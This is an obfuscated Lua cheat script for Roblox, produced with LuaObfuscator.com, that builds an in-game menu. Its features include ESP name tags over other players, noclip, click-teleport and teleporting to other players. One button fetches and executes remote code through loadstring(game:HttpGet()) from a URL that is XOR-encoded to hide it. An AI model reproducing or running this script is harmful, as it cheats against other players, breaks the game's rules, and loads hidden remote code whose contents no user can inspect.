--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v255,v256) local v257={};for v288=1, #v255 do v6(v257,v0(v4(v1(v2(v255,v288,v288 + 1 )),v1(v2(v256,1 + (v288% #v256) ,1 + (v288% #v256) + 1 )))%256 ));end return v5(v257);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));local v9=Instance.new(v7("\5\223\43\200\249","\156\67\173\74\165"));local v10=Instance.new(v7("\18\165\72\27\185","\38\84\215\41\118\220\70"));local v11=Instance.new(v7("\100\19\58\6\220\69\2\54\29\240","\158\48\118\66\114"));local v12=Instance.new(v7("\141\54\17\59\118","\155\203\68\112\86\19\197"));local v13=Instance.new(v7("\114\216\46\232\98\109\241\236\73\211","\152\38\189\86\156\32\24\133"));local v14=Instance.new(v7("\200\82\191\82\222\66\179\82\243\89","\38\156\55\199"));local v15=Instance.new(v7("\156\120\100\60\63\117\248\70\164","\35\200\29\28\72\115\20\154"));local v16=Instance.new(v7("\45\186\201\203\175\57\32\13\176\223","\84\121\223\177\191\237\76"));local v17=Instance.new(v7("\157\68\200\173\63","\161\219\54\169\192\90\48\80"));local v18=Instance.new(v7("\125\71\24\49\107\87\20\49\70\76","\69\41\34\96"));local v19=Instance.new(v7("\136\198\207\30\32\62\168\215\216\4","\75\220\163\183\106\98"));local v20=Instance.new(v7("\54\191\147\35\245\3\184\142\59","\185\98\218\235\87"));local v21=Instance.new(v7("\255\57\63\242\252\191\223\40\40\232","\202\171\92\71\134\190"));local v22=Instance.new(v7("\29\196\52\156\11\212\56\156\38\207","\232\73\161\76"));local v23=Instance.new(v7("\143\220\90\73\60\174\205\86\82\16","\126\219\185\34\61"));local v24=Instance.new(v7("\56\203\70\102\92\120\235","\135\108\174\62\18\30\23\147"));local v25=Instance.new(v7("\130\236\50\223\58\187\39\211\185\231","\167\214\137\74\171\120\206\83"));local v26=Instance.new(v7("\191\245\42\73\212\166\137\245\62","\199\235\144\82\61\152"));local v27=Instance.new(v7("\51\19\161\63\37\3\173\63\8\24","\75\103\118\217"));v15.FontFace=Font.fromName(v7("\232\71\103\21\181\26","\126\167\52\16\116\217"));v20.FontFace=Font.fromName(v7("\231\61\55\129\184\29","\156\168\78\64\224\212\121"));v26.FontFace=Font.fromName(v7("\40\253\178\207\11\234","\174\103\142\197"));v8.Name=v7("\119\59\75\42\36\82\208\67\42","\152\54\72\63\88\69\62");v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\228\200\239\69\209\214\201\73\221","\60\180\164\142"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(113 -48 ,208 -143 ,65);v9.BorderColor3=Color3.fromRGB(0 -0 ,0 + 0 ,0 + 0 );v9.BorderSizePixel=0 -0 ;v9.Position=UDim2.new(377.180343509 -(142 + 235) ,0 -0 ,0.163346618,0 -0 );v9.Size=UDim2.new(0 + 0 ,1585 -(553 + 424) ,0 -0 ,25);v10.Parent=v9;v10.BackgroundColor3=Color3.fromRGB(54 -25 ,29,26 + 3 );v10.BorderColor3=Color3.fromRGB(454 -(13 + 441) ,0 -0 ,0 + 0 );v10.BorderSizePixel=0 + 0 ;v10.Position=UDim2.new( -(0.00040174785 + 0),0 + 0 ,0.998884261 + 0 ,0 -0 );v10.Size=UDim2.new(0 -0 ,1361 -753 ,0 + 0 ,148 + 189 );v11.Name=v7("\107\91\17\61\46\227\21\75","\114\56\62\101\73\71\141");v11.Parent=v10;v11.BackgroundColor3=Color3.fromRGB(0 -0 ,753 -(239 + 514) ,0 -0 );v11.BorderColor3=Color3.fromRGB(0 + 0 ,1329 -(797 + 532) ,0);v11.BorderSizePixel=0 + 0 ;v11.Position=UDim2.new(0.202302635 + 0 ,0 + 0 ,0.0514951088 -0 ,1202 -(373 + 829) );v11.Size=UDim2.new(731 -(476 + 255) ,533 -(153 + 280) ,0 -0 ,1155 -(369 + 761) );v11.Font=Enum.Font.Oswald;v11.Text=v7("\144\252\217\132\139\236\207\208\177\231\220\215","\164\216\137\187");v11.TextColor3=Color3.fromRGB(148 + 107 ,101 + 154 ,134 + 121 );v11.TextScaled=true;v11.TextSize=14;v11.TextWrapped=true;v12.Parent=v11;v12.BackgroundColor3=Color3.fromRGB(10 + 0 ,12 -5 ,166 -78 );v12.BackgroundTransparency=239 -(64 + 174) ;v12.BorderColor3=Color3.fromRGB(0 + 0 ,667 -(89 + 578) ,0 -0 );v12.BorderSizePixel=336 -(144 + 192) ;v12.Position=UDim2.new( -(217.23944461 -(42 + 174)),0 + 0 ,1 + 0 ,0);v12.Size=UDim2.new(0 + 0 ,669,0 + 0 ,154 + 208 );v12.Visible=false;v13.Parent=v12;v13.BackgroundColor3=Color3.fromRGB(1504 -(363 + 1141) ,0,0 -0 );v13.BorderColor3=Color3.fromRGB(1580 -(1183 + 397) ,0 -0 ,0 + 0 );v13.BorderSizePixel=0 + 0 ;v13.Position=UDim2.new(1975.0209267568 -(1913 + 62) ,0 + 0 ,0.0996660665 + 0 ,0);v13.Size=UDim2.new(0 -0 ,82 + 32 ,1933 -(565 + 1368) ,66 -36 );v13.Font=Enum.Font.Oswald;v13.Text=v7("\246\227\61\183\178\251\75\250\243\51","\107\178\134\81\210\198\158");v13.TextColor3=Color3.fromRGB(12 + 243 ,255,958 -703 );v13.TextScaled=true;v13.TextSize=1675 -(1477 + 184) ;v13.TextWrapped=true;v14.Parent=v12;v14.BackgroundColor3=Color3.fromRGB(0 -0 ,0 + 0 ,856 -(564 + 292) );v14.BorderColor3=Color3.fromRGB(0,0 + 0 ,489 -(457 + 32) );v14.BorderSizePixel=0 -0 ;v14.Position=UDim2.new(0.0194319878 -0 ,304 -(244 + 60) ,0.306848437 + 0 ,0);v14.Size=UDim2.new(0 + 0 ,114,476 -(41 + 435) ,1031 -(938 + 63) );v14.Font=Enum.Font.Oswald;v14.Text=v7("\11\6\141\209\234\20\11\145\213","\202\88\110\226\166");v14.TextColor3=Color3.fromRGB(197 + 58 ,1380 -(936 + 189) ,255);v14.TextScaled=true;v14.TextSize=5 + 9 ;v14.TextWrapped=true;v15.Parent=v12;v15.BackgroundColor3=Color3.fromRGB(1633 -(1565 + 48) ,13 + 7 ,20);v15.BorderColor3=Color3.fromRGB(1138 -(782 + 356) ,267 -(176 + 91) ,0 -0 );v15.BorderSizePixel=0 + 0 ;v15.Position=UDim2.new(0.00141174591 -0 ,0,1092.0213259701 -(975 + 117) ,1875 -(157 + 1718) );v15.Size=UDim2.new(0 + 0 ,608,0 + 0 ,18 + 3 );v15.Font=Enum.Font.Unknown;v15.Text=v7("\240\10\150\227\195\205\8\145","\170\163\111\226\151");v15.TextColor3=Color3.fromRGB(905 -650 ,871 -616 ,1273 -(697 + 321) );v15.TextSize=68 -43 ;v16.Name=v7("\57\63\191\61","\73\113\80\210\88\46\87");v16.Parent=v10;v16.BackgroundColor3=Color3.fromRGB(0,0 -0 ,0 -0 );v16.BorderColor3=Color3.fromRGB(0 + 0 ,0 -0 ,1453 -(666 + 787) );v16.BorderSizePixel=0 -0 ;v16.Position=UDim2.new(1227.0131578948 -(322 + 905) ,611 -(602 + 9) ,1189.0514951088 -(449 + 740) ,872 -(826 + 46) );v16.Size=UDim2.new(947 -(245 + 702) ,315 -215 ,0,9 + 16 );v16.Font=Enum.Font.Oswald;v16.Text=v7("\169\35\192\23","\135\225\76\173\114");v16.TextColor3=Color3.fromRGB(255,2153 -(260 + 1638) ,781 -526 );v16.TextScaled=true;v16.TextSize=454 -(382 + 58) ;v16.TextWrapped=true;v17.Parent=v16;v17.BackgroundColor3=Color3.fromRGB(32 -22 ,188 -(92 + 89) ,88);v17.BackgroundTransparency=1;v17.BorderColor3=Color3.fromRGB(0,0 + 0 ,0 -0 );v17.BorderSizePixel=0 + 0 ;v17.Position=UDim2.new( -(0.189444587 + 0),0 -0 ,1206.27999997 -(902 + 303) ,0 -0 );v17.Size=UDim2.new(0 -0 ,58 + 611 ,1690 -(1121 + 569) ,576 -(22 + 192) );v18.Parent=v17;v18.BackgroundColor3=Color3.fromRGB(683 -(483 + 200) ,0 + 0 ,0 -0 );v18.BorderColor3=Color3.fromRGB(0,1463 -(1404 + 59) ,0 -0 );v18.BorderSizePixel=0 -0 ;v18.Position=UDim2.new(0.0433482826,1135 -(832 + 303) ,765.0969036371 -(468 + 297) ,0 + 0 );v18.Size=UDim2.new(562 -(334 + 228) ,384 -270 ,0 -0 ,54 -24 );v18.Font=Enum.Font.Oswald;v18.Text=v7("\42\225\185\169\169\175\180\90\200\139\128","\199\122\141\216\208\204\221");v18.TextColor3=Color3.fromRGB(73 + 182 ,491 -(141 + 95) ,671 -416 );v18.TextScaled=true;v18.TextSize=14;v18.TextWrapped=true;v19.Parent=v17;v19.BackgroundColor3=Color3.fromRGB(0 + 0 ,1073 -(1036 + 37) ,0);v19.BorderColor3=Color3.fromRGB(0 -0 ,0 -0 ,0 + 0 );v19.BorderSizePixel=0 -0 ;v19.Position=UDim2.new(0.370702535,0 -0 ,0.0969036818 + 0 ,0 + 0 );v19.Size=UDim2.new(0,159 -45 ,0 + 0 ,193 -(92 + 71) );v19.Font=Enum.Font.Oswald;v19.Text=v7("\131\210\19\252\113\230\237\242\54\214","\150\205\189\112\144\24");v19.TextColor3=Color3.fromRGB(126 + 129 ,428 -173 ,1939 -(1466 + 218) );v19.TextScaled=true;v19.TextSize=779 -(574 + 191) ;v19.TextWrapped=true;v20.Parent=v17;v20.BackgroundColor3=Color3.fromRGB(20,20,17 + 3 );v20.BorderColor3=Color3.fromRGB(0 -0 ,0 + 0 ,0);v20.BorderSizePixel=849 -(254 + 595) ;v20.Position=UDim2.new(0.0163594298 + 0 ,126 -(55 + 71) ,0.00751381554 -0 ,1790 -(573 + 1217) );v20.Size=UDim2.new(0 -0 ,47 + 561 ,854 -(174 + 680) ,33 -12 );v20.Font=Enum.Font.Unknown;v20.Text=v7("\22\135\173\69\20\156\2","\112\69\228\223\44\100\232\113");v20.TextColor3=Color3.fromRGB(1194 -(714 + 225) ,183 + 72 ,745 -490 );v20.TextSize=34 -9 ;v21.Parent=v17;v21.BackgroundColor3=Color3.fromRGB(0 + 0 ,0 -0 ,0);v21.BorderColor3=Color3.fromRGB(806 -(118 + 688) ,48 -(25 + 23) ,0 + 0 );v21.BorderSizePixel=1886 -(927 + 959) ;v21.Position=UDim2.new(0.702541113 -0 ,0 -0 ,732.0969036818 -(16 + 716) ,0);v21.Size=UDim2.new(0 -0 ,211 -(11 + 86) ,0,604 -(102 + 472) );v21.Font=Enum.Font.Oswald;v21.Text=v7("\224\47\51\220\185\112","\230\180\127\103\179\214\28");v21.TextColor3=Color3.fromRGB(621 -366 ,241 + 14 ,540 -(175 + 110) );v21.TextScaled=true;v21.TextSize=35 -21 ;v21.TextWrapped=true;v22.Parent=v17;v22.BackgroundColor3=Color3.fromRGB(0 -0 ,1796 -(503 + 1293) ,0 -0 );v22.BorderColor3=Color3.fromRGB(0 + 0 ,1061 -(810 + 251) ,0 + 0 );v22.BorderSizePixel=0 + 0 ;v22.Position=UDim2.new(1859.0433482826 -(821 + 1038) ,0 + 0 ,0.251599818 + 0 ,533 -(43 + 490) );v22.Size=UDim2.new(0,43 + 71 ,733 -(711 + 22) ,116 -86 );v22.Font=Enum.Font.Oswald;v22.Text=v7("\196\42\79\15\164\117\240\204\42\73\67\246\1\212\132\0\31\117\225\83\246\137\23","\128\236\101\63\38\132\33");v22.TextColor3=Color3.fromRGB(1281 -(834 + 192) ,1114 -(240 + 619) ,62 + 193 );v22.TextScaled=true;v22.TextSize=1 + 29 ;v22.TextWrapped=true;v23.Parent=v17;v23.BackgroundColor3=Color3.fromRGB(0 -0 ,0 + 0 ,1744 -(1344 + 400) );v23.BorderColor3=Color3.fromRGB(405 -(255 + 150) ,0 + 0 ,0 + 0 );v23.BorderSizePixel=0;v23.Position=UDim2.new(362.370702535 -(112 + 250) ,0 + 0 ,0.251599818 -0 ,0 -0 );v23.Size=UDim2.new(0 + 0 ,1853 -(404 + 1335) ,406 -(183 + 223) ,36 -6 );v23.Font=Enum.Font.Oswald;v23.Text=v7("\152\185\81\80\185\171\251\173\187\22\65\162","\175\204\201\113\36\214\139");v23.TextColor3=Color3.fromRGB(169 + 86 ,92 + 163 ,190 + 65 );v23.TextScaled=true;v23.TextSize=1444 -(1001 + 413) ;v23.TextWrapped=true;v24.Parent=v23;v24.BackgroundColor3=Color3.fromRGB(592 -(10 + 327) ,178 + 77 ,593 -(118 + 220) );v24.BorderColor3=Color3.fromRGB(0 + 0 ,882 -(244 + 638) ,449 -(108 + 341) );v24.BorderSizePixel=0;v24.Position=UDim2.new( -0.114035085,0 + 0 ,1.79999995,602 -(512 + 90) );v24.Size=UDim2.new(0 -0 ,1633 -(711 + 782) ,0 + 0 ,8 + 22 );v24.Font=Enum.Font.SourceSansBold;v24.Text=v7("\110\194\38\217\22\83\140\1\221\22\64\201\33\156\44\66\222\48\146","\100\39\172\85\188");v24.TextColor3=Color3.fromRGB(0 -0 ,0 -0 ,469 -(270 + 199) );v24.TextScaled=true;v24.TextSize=11 + 3 ;v24.TextWrapped=true;v25.Parent=v17;v25.BackgroundColor3=Color3.fromRGB(0 + 0 ,1819 -(580 + 1239) ,0 + 0 );v25.BorderColor3=Color3.fromRGB(0 -0 ,1236 -(298 + 938) ,0 + 0 );v25.BorderSizePixel=1666 -(636 + 1030) ;v25.Position=UDim2.new(0.0433482826 + 0 ,0 + 0 ,0.400771081 + 0 ,0 -0 );v25.Size=UDim2.new(0 + 0 ,1281 -(645 + 522) ,1790 -(1010 + 780) ,6 + 24 );v25.Font=Enum.Font.Oswald;v25.Text=v7("\139\116\160\192\27\184\122","\83\205\24\217\224");v25.TextColor3=Color3.fromRGB(255 + 0 ,1214 -959 ,747 -492 );v25.TextScaled=true;v25.TextSize=30;v25.TextWrapped=true;v26.Parent=v9;v26.BackgroundColor3=Color3.fromRGB(2091 -(1045 + 791) ,445 -190 ,645 -390 );v26.BackgroundTransparency=1 -0 ;v26.BorderColor3=Color3.fromRGB(0 + 0 ,505 -(351 + 154) ,1574 -(1281 + 293) );v26.BorderSizePixel=266 -(28 + 238) ;v26.Position=UDim2.new( -(21.157894731 -(20 + 1)),0 -0 , -(1559.439999998 -(1381 + 178)),0 + 0 );v26.Size=UDim2.new(685 -(314 + 371) ,332,0 -0 ,38 + 8 );v26.Font=Enum.Font.Unknown;v26.Text=v7("\199\214\217\47\231\201\141\21\243\199\141\31\227\209\204","\93\134\165\173");v26.TextColor3=Color3.fromRGB(109 + 146 ,879 -624 ,825 -570 );v26.TextSize=25;v27.Parent=v9;v27.BackgroundColor3=Color3.fromRGB(0 + 0 ,470 -(381 + 89) ,0 + 0 );v27.BorderColor3=Color3.fromRGB(0 + 0 ,0 + 0 ,0 -0 );v27.BorderSizePixel=1156 -(1074 + 82) ;v27.Position=UDim2.new(0.823707998,0 -0 , -(1784.0131524662 -(214 + 1570)),1455 -(990 + 465) );v27.Size=UDim2.new(0 + 0 ,107,0 + 0 ,25 + 0 );v27.Visible=false;v27.Font=Enum.Font.Oswald;v27.Text=v7("\141\250\206\213\122\227\189\108\187","\30\222\146\161\162\90\174\210");v27.TextColor3=Color3.fromRGB(1003 -748 ,1981 -(1668 + 58) ,881 -(512 + 114) );v27.TextScaled=true;v27.TextSize=36 -22 ;v27.TextWrapped=true;local function v243() local v258=Instance.new(v7("\201\65\115\11\233\125\115\24\236\94\100","\106\133\46\16"),v13);v258.Parent.MouseButton1Click:Connect(function() v258.Parent.Parent.Parent.Parent.Parent.Parent:Destroy();end);end coroutine.wrap(v243)();local function v244() local v259=0 -0 ;local v260;while true do if (v259==(0 -0)) then v260=Instance.new(v7("\116\47\112\253\86\115\91\50\122\236\78","\32\56\64\19\156\58"),v14);v260.Parent.MouseButton1Click:Connect(function() v260.Parent.Parent.Parent.Parent.Visible=false;v260.Parent.Parent.Parent.Parent.Parent.TextButton.Visible=true;end);break;end end end coroutine.wrap(v244)();local function v245() local v261=0 + 0 ;local v262;while true do if (v261==(0 + 0)) then v262=Instance.new(v7("\118\199\230\87\86\193\131\72\193\245\66","\224\58\168\133\54\58\146"),v11);v262.Parent.MouseButton1Click:Connect(function() local v313=0 + 0 ;local v314;while true do if (v313==(0 -0)) then v314=1994 -(109 + 1885) ;while true do if ((1469 -(1269 + 200))==v314) then v262.Parent.Frame.Visible=true;v262.Parent.Parent.Home.Frame.Visible=false;break;end end break;end end end);break;end end end coroutine.wrap(v245)();local function v246() local v263=Instance.new(v7("\117\89\72\252\121\181\132\25\80\70\95","\107\57\54\43\157\21\230\231"),v18);v263.Parent.MouseButton1Click:Connect(function() local v289=0 -0 ;local v290;local v291;local v292;local v293;while true do if (v289==(817 -(98 + 717))) then v293=nil;function v293() for v344,v345 in pairs(v290:GetPlayers()) do if (v345.Character and v345.Character:FindFirstChild(v7("\41\226\73\91","\19\97\135\40\63"))) then v292(v345);end end end v289=829 -(802 + 24) ;end if (v289==3) then v290.PlayerAdded:Connect(v292);v293();v289=6 -2 ;end if (v289==0) then v290=game:GetService(v7("\235\135\16\236\188\206\220","\175\187\235\113\149\217\188"));v291=game:GetService(v7("\14\186\143\127\230\107\110\53\172\132","\24\92\207\225\44\131\25"));v289=2 -1 ;end if (v289==(4 -0)) then v291.RenderStepped:Connect(function() for v346,v347 in pairs(v290:GetPlayers()) do local v348=0 + 0 ;local v349;while true do if ((0 + 0)==v348) then v349=v347.Character:FindFirstChild(v7("\134\89\50\63","\81\206\60\83\91\79")):FindFirstChild(v7("\108\162\220\126\45\204\76\182\74\140\197\123","\196\46\203\176\18\79\163\45"));if v349 then v349.Adornee=v347.Character.Head;end break;end end end end);break;end if ((1 + 0)==v289) then local v315=1086 -(686 + 400) ;while true do if (v315==1) then v289=2 + 0 ;break;end if (v315==0) then v292=nil;function v292(v381) local v382=0 + 0 ;local v383;local v384;while true do if (2==v382) then v384.Size=UDim2.new(2 -1 ,0 -0 ,1 + 0 ,0 + 0 );v384.Text=v381.Name;v384.TextSize=12 + 2 ;v384.BackgroundTransparency=1 + 0 ;v382=2 + 1 ;end if (v382==(1 -0)) then v383.Adornee=v381.Character.Head;v383.AlwaysOnTop=true;v384=Instance.new(v7("\137\220\56\88\145\216\34\73\177","\44\221\185\64"));v384.Parent=v383;v382=2;end if (v382==(1433 -(797 + 636))) then v383=Instance.new(v7("\105\218\180\64\25\114\74\193\188\107\14\116","\29\43\179\216\44\123"));v383.Parent=v381.Character.Head;v383.Size=UDim2.new(0 + 0 ,74 + 26 ,0 -0 ,1639 -(1427 + 192) );v383.StudsOffset=Vector3.new(513 -(203 + 310) ,2 + 1 ,0 -0 );v382=1535 -(709 + 825) ;end if ((3 + 0)==v382) then v384.TextColor3=Color3.new(1 + 0 ,1,327 -(192 + 134) );break;end end end v315=865 -(196 + 668) ;end end end end end);end coroutine.wrap(v246)();local function v247() local v264=Instance.new(v7("\148\45\125\31\40\200\236\170\43\110\10","\143\216\66\30\126\68\155"),v19);l=11 -8 ;r=1276 -(316 + 960) ;v264.Parent.MouseButton1Click:Connect(function() if (r==(0 + 0)) then v264.Parent.Text=v7("\132\199\14\199\204\179\151\206\132","\129\202\168\109\171\165\195\183");l=2 + 0 ;r=1 + 0 ;repeat local v316=0 -0 ;local v317;while true do if (v316==(0 -0)) then wait(0.0001);v317=game.Players.LocalPlayer;v317.Character.HumanoidRootPart.CanCollide=false;v317.Character.HumanoidRootPart.CanQuery=false;v317.Character.Head.CanCollide=false;v316=1;end if (v316==3) then local v357=551 -(83 + 468) ;while true do if (v357==(1806 -(1202 + 604))) then v317.Character.LeftUpperLeg.CanCollide=false;v317.Character.RightFoot.CanCollide=false;v357=1 + 0 ;end if (v357==(4 -3)) then v317.Character.RightHand.CanCollide=false;v317.Character.RightLowerArm.CanCollide=false;v357=2 -0 ;end if (v357==2) then v317.Character.RightLowerLeg.CanCollide=false;v316=10 -6 ;break;end end end if (v316==(329 -(45 + 280))) then local v358=0 + 0 ;while true do if ((1 + 0)==v358) then v317.Character.LeftFoot.CanQuery=false;v317.Character.LeftHand.CanQuery=false;v358=2 -0 ;end if (v358==(1 + 1)) then v317.Character.LeftLowerArm.CanQuery=false;v316=2 + 3 ;break;end if (v358==(297 -(45 + 252))) then v317.Character.RightUpperArm.CanCollide=false;v317.Character.RightUpperLeg.CanCollide=false;v358=1;end end end if (v316==(2 + 0)) then v317.Character.LeftFoot.CanCollide=false;v317.Character.LeftHand.CanCollide=false;v317.Character.LeftLowerArm.CanCollide=false;v317.Character.LeftLowerLeg.CanCollide=false;v317.Character.LeftUpperArm.CanCollide=false;v316=1 + 2 ;end if (v316==6) then v317.Character.RightLowerArm.CanQuery=false;v317.Character.RightLowerLeg.CanQuery=false;v317.Character.RightUpperArm.CanQuery=false;v317.Character.RightUpperLeg.CanQuery=false;break;end if (v316==(1 -0)) then v317.Character.Head.CanQuery=false;v317.Character.LowerTorso.CanQuery=false;v317.Character.LowerTorso.CanCollide=false;v317.Character.UpperTorso.CanCollide=false;v317.Character.UpperTorso.CanQuery=false;v316=1913 -(340 + 1571) ;end if (v316==(2 + 3)) then local v373=1772 -(1733 + 39) ;while true do if (v373==0) then v317.Character.LeftLowerLeg.CanQuery=false;v317.Character.LeftUpperArm.CanQuery=false;v373=1 -0 ;end if (v373==(5 -3)) then v317.Character.RightHand.CanQuery=false;v316=1040 -(125 + 909) ;break;end if (v373==(1949 -(1096 + 852))) then v317.Character.LeftUpperLeg.CanQuery=false;v317.Character.RightFoot.CanQuery=false;v373=1 + 1 ;end end end end until l==(1 -0)  elseif (r==(1 + 0)) then local v339=512 -(409 + 103) ;while true do if (v339==(236 -(46 + 190))) then v264.Parent.Text=v7("\12\87\52\212\215\4\166\13\126\17","\134\66\56\87\184\190\116");l=96 -(51 + 44) ;v339=1 + 0 ;end if (v339==(466 -(170 + 295))) then r=1317 -(1114 + 203) ;repeat local v389=0 + 0 ;local v390;while true do if (v389==3) then v390.Character.LowerTorso.CanCollide=true;v390.Character.LowerTorso.CanQuery=true;v389=730 -(228 + 498) ;end if ((0 + 0)==v389) then wait(0.0001 + 0 );v390=game.Players.LocalPlayer;v389=664 -(174 + 489) ;end if (v389==(5 -3)) then v390.Character.Head.CanCollide=true;v390.Character.Head.CanQuery=true;v389=3;end if (v389==(1909 -(830 + 1075))) then v390.Character.UpperTorso.CanQuery=true;v390.Character.UpperTorso.CanCollide=true;break;end if (v389==(525 -(303 + 221))) then v390.Character.HumanoidRootPart.CanCollide=true;v390.Character.HumanoidRootPart.CanQuery=true;v389=1271 -(231 + 1038) ;end end until l==(2 + 0)  break;end end end end);end coroutine.wrap(v247)();local function v248() local v265=Instance.new(v7("\16\62\10\186\21\216\34\39\53\33\29","\85\92\81\105\219\121\139\65"),v21);repeat wait();until game.Players.LocalPlayer.Character v265.Parent.MouseButton1Click:Connect(function() local v294=1162 -(171 + 991) ;local v295;local v296;local v297;local v298;while true do if ((1 + 0)==v294) then v297=v295:GetMouse();v298=Instance.new(v7("\201\188\95\73","\191\157\211\48\37\28"));v294=8 -6 ;end if ((5 -3)==v294) then v298.Name=v7("\235\47\192\19\53\211","\90\191\127\148\124");v298.Parent=v295.Backpack;v294=11 -8 ;end if (v294==(0 -0)) then local v321=0 + 0 ;while true do if (1==v321) then v294=3 -2 ;break;end if (v321==(0 -0)) then v295=game.Players.LocalPlayer;v296=v295.Character;v321=1 -0 ;end end end if (v294==(2 + 1)) then v298.RequiresHandle=false;v298.Activated:connect(function() local v340=0 -0 ;local v341;while true do if (v340==(1248 -(111 + 1137))) then v341=v297.Hit;v296:MoveTo(v341.p);break;end end end);break;end end end);end coroutine.wrap(v248)();local function v249() local v266=0 -0 ;local v267;local v268;local v269;local v270;local v271;local v272;while true do if (v266==0) then v267=Instance.new(v7("\84\136\45\22\116\180\45\5\113\151\58","\119\24\231\78"),v22);v268=game.Players.LocalPlayer;v266=159 -(91 + 67) ;end if (v266==(2 -1)) then v269=v268.Character or v268.CharacterAdded:Wait() ;v270=v269:WaitForChild(v7("\170\56\168\75\210\79\24\134\31\170\69\200\112\16\144\57","\113\226\77\197\42\188\32"));v266=1 + 1 ;end if (v266==(526 -(423 + 100))) then function v272() for v342,v343 in pairs(game.Players:GetPlayers()) do if (v343~=v268) then local v376=0;local v377;while true do if ((0 + 0)==v376) then v377=v343.Character;if (v377 and v377:FindFirstChild(v7("\18\3\249\180\52\25\253\177\8\25\251\161\10\23\230\161","\213\90\118\148"))) then local v437=0 -0 ;local v438;while true do if (v437==(0 + 0)) then v438=v377.HumanoidRootPart;v270.CFrame=v438.CFrame;v437=1 + 0 ;end if ((772 -(326 + 445))==v437) then wait(0.6 -0 );break;end end end break;end end end end end v271.MouseButton1Click:Connect(function() v272();end);break;end if (v266==(4 -2)) then v271=v267.Parent;v272=nil;v266=6 -3 ;end end end coroutine.wrap(v249)();local function v250() local v273=Instance.new(v7("\119\33\183\87\65\104\45\166\95\93\79","\45\59\78\212\54"),v23);v273.Parent.MouseButton1Click:Connect(function() local v299=0;local v300;local v301;local v302;while true do if (v299==(711 -(530 + 181))) then v300=game.Players.LocalPlayer.Character;v301=v273.Parent.TextBox;v299=882 -(614 + 267) ;end if (v299==(33 -(19 + 13))) then v302=workspace:FindFirstChild(v301);if (v302 and v302:FindFirstChild(v7("\56\67\142\138\136\33\164\244\34\89\140\159\182\47\191\228","\144\112\54\227\235\230\78\205"))) then local v350=v302.HumanoidRootPart;local v351=v300:FindFirstChild(v7("\155\61\2\253\222\84\186\44\61\243\223\79\131\41\29\232","\59\211\72\111\156\176"));if v351 then v351.CFrame=v350.CFrame;end else print("Jogador alvo não encontrado no Workspace ou não possui HumanoidRootPart.");end break;end end end);end coroutine.wrap(v250)();local function v251() local v274=0;local v275;while true do if (v274==(0 -0)) then v275=Instance.new(v7("\98\136\224\44\66\180\224\63\71\151\247","\77\46\231\131"),v25);v275.Parent.MouseButton1Click:Connect(function() loadstring(game:HttpGet(v7("\178\64\162\80\169\14\249\15\170\85\165\84\191\86\191\78\244\87\185\77\245\70\183\87\245\109\133\108\233\76\157\121\143","\32\218\52\214")))();end);break;end end end coroutine.wrap(v251)();local function v252() local v276=0;local v277;while true do if (v276==(0 -0)) then v277=Instance.new(v7("\98\24\50\169\253\131\70\72\71\7\37","\58\46\119\81\200\145\208\37"),v16);v277.Parent.MouseButton1Click:Connect(function() local v325=0 -0 ;local v326;while true do if (v325==(0 -0)) then v326=0 + 0 ;while true do if (v326==0) then v277.Parent.Frame.Visible=true;v277.Parent.Parent.Settings.Frame.Visible=false;break;end end break;end end end);break;end end end coroutine.wrap(v252)();local function v253() local v278=Instance.new(v7("\7\131\51\173\165\142\53\57\133\32\184","\86\75\236\80\204\201\221"),v27);v278.Parent.MouseButton1Click:Connect(function() local v303=0 + 0 ;while true do if (v303==(0 + 0)) then v278.Parent.Parent.Frame.Visible=true;v278.Parent.Visible=false;break;end end end);end coroutine.wrap(v253)();local function v254() local v279=0 -0 ;local v280;local v281;local v282;local v283;local v284;local v285;local v286;local v287;while true do if (v279==(1696 -(556 + 1139))) then v283=Instance.new(v7("\114\181\206\183\102\187\205\174\85","\219\48\218\161"));v283.Parent=v280.Parent;v284=v280.Parent;v279=3 -1 ;end if (v279==(1812 -(1293 + 519))) then v280=Instance.new(v7("\94\78\116\132\242\184\113\83\126\149\234","\235\18\33\23\229\158"),v9);v281=game.Players.LocalPlayer;v282=v281:GetMouse();v279=1;end if ((5 -2)==v279) then v287=nil;function v287(v329) v284.Position=UDim2.new(169 -(28 + 141) ,v329.X-(v284.AbsoluteSize.X/(4 -2)) ,0 -0 ,v329.Y-(v284.AbsoluteSize.Y/(8 -6)) );end v282.Button1Down:Connect(function() if v286(Vector2.new(v282.X,v282.Y)) then v283.Value=true;end end);v279=9 -5 ;end if (v279==(3 + 2)) then v285.TouchMoved:Connect(function(v331,v332) if (v283.Value and  not v332) then v287(v331.Position);end end);v285.TouchEnded:Connect(function(v333,v334) v283.Value=false;end);break;end if (v279==(1 + 3)) then local v310=0 -0 ;while true do if (v310==(1 + 0)) then v285.TouchStarted:Connect(function(v378,v379) if ( not v379 and v286(v378.Position)) then v283.Value=true;v287(v378.Position);end end);v279=2 + 3 ;break;end if (v310==(0 + 0)) then v282.Button1Up:Connect(function() v283.Value=false;end);v282.Move:Connect(function() if v283.Value then v287(Vector2.new(v282.X,v282.Y));end end);v310=1 + 0 ;end end end if (v279==(1098 -(709 + 387))) then v285=game:GetService(v7("\209\98\121\91\242\65\240\241\101\79\76\201\89\233\231\116","\128\132\17\28\41\187\47"));v286=nil;function v286(v336) local v337=v284.AbsolutePosition;local v338=v284.AbsoluteSize;return (v336.X>=v337.X) and (v336.X<=(v337.X + v338.X)) and (v336.Y>=v337.Y) and (v336.Y<=(v337.Y + v338.Y)) ;end v279=1861 -(673 + 1185) ;end end end coroutine.wrap(v254)();
